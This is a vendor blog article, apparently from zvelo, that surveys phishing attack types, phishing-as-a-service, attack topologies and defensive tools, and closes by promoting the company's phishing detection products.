Phishing Detection: Attack Types, Detection Tools, and More.

Frequently used as the initial attack vector to breach an organization’s network, phishing continues to rank as a top threat. From Business Email Compromise (BEC), to social engineering, to good old fashioned email, this article serves to provide a broad overview of phishing detection, including the different types of phishing attacks, the tools and tactics threat actors employ to construct and execute their phishing attacks, and the solutions that organizations can use to defend against these attacks. By gaining a better understanding of the anatomy of a phishing attack, organizations can learn to maximize their phishing detection capabilities to ensure they are able to defend against a myriad of different attacks.

What is Phishing?

Phishing is a type of cyber attack in which threat actors attempt to deceive users into revealing sensitive personal information like passwords, credit card or banking information, or other personal information that can be weaponized in subsequent attacks. While threat actors use a wide array of tools and tactics in constructing their phishing campaigns, there are three primary methods used for stealing information:

Malicious links appearing as impostor websites that are infected with malware.
Malicious file attachments that are infected with malware to compromise a user’s computer and/or files.
Fraudulent data entry forms that prompt users to fill in login credentials or other sensitive information like credit card data, banking details, phone numbers, etc.

Phishing as a Service

Traditionally, phishing attacks were exclusive to the more tech savvy and skilled cybercriminals, requiring in-depth knowledge of coding, scripting, social engineering, and other techniques. However, over the last several years, we have witnessed the evolution of Phishing-as-a-Service (PaaS) which essentially removes those technical barriers by offering ready-made templates and user-friendly interfaces to simplify the entire process into a point-and-click operation.

Phishing as a Service represents the commoditization and democratization of phishing tools, transforming them from specialized instruments into commercial products. These are no longer hidden in the shadows but are openly available for purchase or rent, sometimes even in legal and accessible markets. The unprecedented ease of access to these tools means that aspiring cybercriminals, without the need to master coding or network infiltration, can launch effective phishing attacks. PaaS platforms provide pre-made phishing campaigns that can be easily customized and deployed by anyone willing to engage in cyber fraud. These platforms may come with customer support, tutorials, and updates, making it all the more accessible to the masses. The transformation is akin to turning a specialist’s toolkit into a consumer product, and its implications are as profound as they are concerning.

Types of Phishing Attacks

In its original and most common form, the attack is initiated via an email purporting to be from a reputable or legitimate source, enticing the victim to react by clicking a link to a fraudulent page used for credential harvesting. As is the case with all cyber threats, these attacks have evolved and adapted to take advantage of the latest advances in technology to compromise more victims as well as to evade phishing detection. Understanding the different types of attacks is crucial to ensuring any phishing detection solutions put in place will have the capability to identify each of the different types of attacks. Below is a range of different attack types that we see in the threat landscape.

Angler Phishing. Angler phishing is a phishing attack that targets victims through social media by impersonating customer service or support agents. Attackers create fake social media accounts for top brands to trick dissatisfied customers into revealing personal information when they are redirected from social media sites to phishing sites, and asked to complete tasks that compromise their personal information. Financial institutions are often targeted in this type of attack.

Business Email Compromise (BEC). BEC is a highly targeted spear phishing attack that relies on name recognition to convince targeted victims to complete the request. BEC begins with relatively simple hacking or spoofing of email accounts belonging to key executives like the CEO, CFO, or other roles with financial authority, where the attacker then sends requests for wire payments to fraudulent bank accounts. Frequently, BEC involved compromised vendor emails, requests for W-2 information, or requests for large amounts of gift cards.

Clone Phishing. Clone phishing is an email-based attack where attackers duplicate a legitimate email and replace the original attachments with malware. As the victim receives a reply to a genuine email, basic phishing detection tools like email filters fail to catch this type of attack because it is sent from a legitimate user and uses legitimate channels. Unlike traditional phishing attacks, clone phishing does not require email spoofing because it is often sent from an actual, legitimate email address.

Content Injection. Also called content spoofing, arbitrary text injection, or virtual defacement, content injection is an attack that targets users by an injection vulnerability in a web application. In this type of attack, the threat actor is able to modify a legitimate domain’s page to display a modified version to the user. A valid web page is created using the attacker’s malicious recommendation and the user believes the recommendation was from the stock website. Frequently used in social engineering attacks, content injection exploits both a user’s trust as well as a code-based vulnerability.

Domain Spoofing. Domain spoofing, also known as website spoofing, is a type of phishing where an attacker replicates a legitimate organization’s domain. They may create false domain names that appear to be legitimate or slightly alter legitimate domain names to trick users. Attackers often use logos, branding, and visual designs taken from a legitimate domain to create the spoofed website intended to harvest sensitive data from victims who believe they are visiting the legitimate website.

Evil-Twin Wi-Fi. An evil-twin attack is when a threat actor stands up a fake Wi-Fi access point to get users to connect, passing through the attacker’s access point rather than a legitimate one. The attacker gains control of the data shared between the user and the network by directing it to a server under their control. The attacker can easily create an evil twin using common software and a smartphone or other internet-capable device. These attacks are prevalent on unsecured public Wi-Fi networks like coffee shops, airports, libraries, etc., as they allow attackers to capture any login details or other sensitive information from users connected to the fake Wi-Fi access point.

HTTPs Phishing. It used to be that sites using HTTPS vs. HTTP were assumed to be generally safe, and phishing detection tools could easily distinguish between the safe and unsafe sites. However, that is no longer the case, as more than half of phishing sites have been observed using https. There are several types of HTTPS phishing, the most common of which are listed below.

Man-in-the-Middle (MiTM) is where an attacker compromises the communication between two parties while the data is en route. The hacker then impersonates one or both parties to intercept sensitive and confidential information before relaying information on to the intended destination. Though the hacker maintains the ability to alter or inject communications into the pathway, typically the hacker receives and relays most communications unaltered to its intended destination—so as to not be detected.
SSL Stripping is a type of MiTM attack where the attacker downgrades a secure HTTPS connection to an unencrypted HTTP connection by removing the encryption layer, making it vulnerable to eavesdropping and data theft.
Wildcard Certificate attacks are when threat actors are able to access a wildcard certificate, either by stealing a private key or by deceiving a certification authority into issuing the certificate to a fake company. Once an attacker has this certificate, it can be used to impersonate any subdomain of the legitimate domain.

Image Phishing. Image phishing is a type of email phishing attack that uses images to deceive users into clicking on malicious links. This method is gaining popularity because the various obfuscation techniques on the images, such as stretching, color change, compression, and noise addition, make it more difficult for phishing detection solutions to identify. They store the entire visual content of the email in a PNG or JPG file hosted remotely on reputable domains like Wikipedia or Google. By doing this, the attacker can bypass the filter’s reputation scan, making it difficult to analyze textual content placed on the image, which may conceal suspicious keywords or language.

Pharming. Pharming is a type of phishing attack that redirects web traffic to a location or website different from what was intended by the user. Attackers can alter the host file on a victim’s computer or exploit a weakness in DNS software, enabling them to reroute internet requests and traffic. Attackers can also compromise DNS servers which allows them to override DNS data and redirect traffic to an unintended site.

Pop-Up Phishing. Pop-up phishing is when users are browsing the web and a fraudulent pop up message appears, informing them that their device has been infected by a virus. These pop-up ads use scare tactics to trick users into installing malware on their computers, calling fake support numbers, or purchasing antivirus protection that they may not need.

Search Engine Phishing. Search Engine Phishing, also known as SEO poisoning, or SEO Trojans, are a type of phishing attack where the threat actors manipulate search engine results in order to appear as the top hit. When users click on the link from the search results, they are redirected to the attacker’s site, which is designed to steal their personal information.

Smishing – Short for SMS Phishing, Smishing occurs when the attacker tricks the user into clicking a link, disclosing sensitive information, or downloading a trojan, virus, or other piece of malware using the text—or SMS—features on their cellular phone or mobile device.

READ: Attacking IP Detection Enhances zvelo's Threat Intelligence Solutions

Social Engineering – Social engineering attacks are a type of cybercrime that use psychological manipulation to trick people into giving away sensitive information or doing things that might not be in their best interests—including providing access to computers or systems that may have access to those types of information. The creation of fake accounts on social media platforms, targeted phishing attacks, and telephone/ransom scams are all examples of social engineering at work.

Social Media Phishing. Social media phishing is where attackers gather their victims’ personal information from various social media accounts to then sell on the dark web or gain unauthorized access to financial accounts. The attackers may also use this information for credential phishing purposes. By collecting personal details — birthday, middle name, mother’s maiden name, etc. — and making educated guesses about the financial institutions you use, attackers might be able to reset your password and gain access to your accounts.

Spear Phishing. Spear phishing is a targeted attack where a threat actor might send fraudulent emails purporting to be from a reputable and trustworthy source in order to deceive or reveal vulnerabilities or sensitive information from a particular individual or company.

Tabnabbing. Tabnabbing is a type of phishing attack that relies on social engineering. It occurs when an attacker exploits inactive web pages left open in a user’s browser and manipulates them to redirect the user to a malicious website. The goal of this attack is to deceive users into divulging sensitive information or login credentials.

Vishing. Vishing is the equivalent of a phishing attack using a telephone or VOIP (Voice Over Internet Protocol) network in an attempt to scam a victim into revealing personal details used for identity theft, credit card fraud, and more.

Watering Hole. In a watering hole attack, a threat actor compromises a specific website or group of websites likely to be visited by a particular group of individuals with the goal of infecting the visitors’ computers with malware.

Whaling. Whaling is a targeted phishing attack used by cybercriminals alleging to be an executive or senior official with an organization for the purposes of deceiving senior members of another organization for the purposes of stealing money, sensitive information, or otherwise gaining access to computer systems.

Phishing Detection Based On Attack Topologies

Detecting the different types of phishing attacks can be quite challenging because phishing threats are not homogeneous in nature. Malicious actors use several different phishing attack topologies to execute their campaigns — each of which require a different phishing detection approach to mitigate the threat.

Typically, phishing attacks are architected in one of the following three ways:

Domain-Based. The malicious actor sets up their own domain and website to launch their attack. In this case, the actor registers the domain, deploys a web server, and then hosts the web page or pages needed to carry out the phishing attack.
Compromised-Based. The malicious actor may compromise an existing legitimate website and insert a phishing page within the website without the site owner’s knowledge.
Unmonitored-Sites Based. Sites that allow user content to be hosted or uploaded can also serve as a place for phishing pages to be hosted. For example, cloud storage, blogging sites, web application hosting sites, etc., are often used to carry out phishing attacks.

Phishing detection across these three different phishing attack topologies requires a solution that can be tailored for each scenario, as there are different signals to consider for each type of attack. In order to block phishing attacks before an attacker is able to gain a foothold in the network, defenders must be able to detect phishing threats as soon as possible from the point at which the threats become active. The same techniques that can ferret out malicious domains owned by the attacker will not have the same level of effectiveness if the attacker is using legitimate websites to host their phishing pages.

Tools for Phishing Detection

Different solutions will detect phishing threats at various points of an attack. The closer the phishing detection capability is in relation to the first click, the higher your chances will be to avoid an attack, so it’s imperative to build your cybersecurity defense strategy with as many defensive layers as possible. Below are some of the most common tools used for phishing detection. Because phishing detection often necessitates the inclusion of malware detection, the list of tools commonly deployed to protect networks against phishing attacks are much the same as those used for malicious detection.

DNS Filtering. DNS Filtering can provide phishing detection by monitoring communication between end users and the internet, enabling the necessary visibility to inspect sites at the source so you can implement security protocols that will block high risk or potentially dangerous DNS connections to malicious, phishing, and non-sanctioned (objectionable) content domains. DNS Filtering is provided by ISPs, Cable and Telco Service Providers, and by SASE vendors targeting enterprise and mid-market customers.

Firewalls. Since cyber attacks begin with the threat actors gaining access to a network, a firewall is often the first line of defense for phishing detection. The firewall blocks certain ports from accessing the network, and uses behavioral and/or rule-based detections to stop an attacker from gaining access to the network.

Network Intrusion Prevention Systems (NIDS). NIDS provide another layer of security by using behavioral and rule based detection for potential phishing threats at the network level. Additionally, NIDS are equipped to provide the data granularity necessary for cyber analysts to detect an attack so that they can respond with a targeted approach to block an attacker from accessing the network.

Endpoint Detection and Response (EDR). EDRs provide crucial visibility for network security teams to detect phishing or malicious threats if the attackers manage to evade the other security layers and penetrate the network. EDRs provide host-based detection, investigation and remediation against malware to contain threats before the nefarious actions of an attacker can be fully executed.

Logging. Logging network traffic enables security teams to monitor the network for known Indicators of Compromise (IOCs) and activities that may indicate potential phishing threats, like abnormal network activity, sudden spikes in traffic, or suspicious traffic patterns. Traffic logs can also help identify new IOCs — including malicious urls, domains, or IPs — or suspicious activity on endpoints to aid security teams with threat hunting activities. Additionally, logging helps identify the scope of an attack because it can be used to reconstruct the events leading up to an incident.

Education and Awareness. There are a variety of phishing awareness training programs on the market geared towards training employees on recognizing the different attack attempts, and providing guidance on how to respond — or not respond — and report as appropriate. Training courses can be delivered in a classroom setting, online, part of a simulated attack, or a combination of those elements.

Use Cases for Incorporating Phishing Threat Data Into Your Phishing Detection Solutions

DNS and Web Filtering. Block high-risk or potentially dangerous DNS connections to malicious, phishing, and non-sanctioned content domains. Premium solutions offer filtering with protection and support at the domain, page-level, and full-path URL. DNS Filtering Case Study.
Enrich Security Tools. Enrich and automate SIEM, SOAR, and other security platforms with malicious threat intelligence data to improve efficiency and speed of response.
SWG, FWaaS, CASBs. Secure cloud native environments with full-path URL phishing and malicious datasets to protect users, networks and devices in the modern hybrid workforce.
SASE. Whether you use a URL database, threat intelligence feeds, or both, having full-path malicious URL visibility and blocking capabilities power maximum protection for SASE security solutions.
XDR/MDR. Augment in-house threat intelligence ingestion, aggregation and curation with better and faster threat detections to power your XDR/MDR offerings. MDR Case Study.
Endpoint Security. Stop threats at the endpoints and IoT devices with premium phishing and malicious URL datasets.
Browser Security/Remote Browser Isolation. Allow users at any location to safely browse the internet while blocking access to phishing sites. Case Study for RBI.
Email/SMS Security. Malicious threat prevention for endpoint, email, and text message security. Smishing Protection Case Study.
Cyber Threat Intelligence. Threat intelligence data on malicious URLs and IOCs enable defenders to block adversaries at the initial access point for comprehensive malicious threat protection. Cyber Threat Intelligence Business Case.
Threat Research. Understand the contextual relevance of potential threats with key metadata that map to the malicious threat signals in your environment. Malicious threat intelligence data can be used for research, forensic analysis, historical lookback, and more.

zvelo Phishing Detection and Phishing Threat Intelligence Solutions

zvelo offers a number of different phishing detection solutions that can improve your organization’s defense strategy. The best solution will vary from one organization to the next and depend on the nature of the business, the industry, the type of data involved, cyber risk levels and more. Below are a few options that organizations should consider implementing as countermeasures against social engineering and phishing attacks.

zveloDB is the market’s premium URL classification database and web content categorization service, powering the world’s leading Web Filtering and DNS Filtering, Endpoint Security, Endpoint Detection and Response (EDR), and other security applications.

PhishBlocklist supplies curated phishing cyber threat intelligence for comprehensive protection against active phishing threats in the wild. Provides detections and rich metadata attributes like date detected, targeted brand, and other crucial data points.

PhishScan is a fast, easy-to-implement cloud API query service to get an immediate yes/no response as to whether a URL/IP is phishing. Ideal for email/SMS/surfing applications that require real-time phishing verification lookups.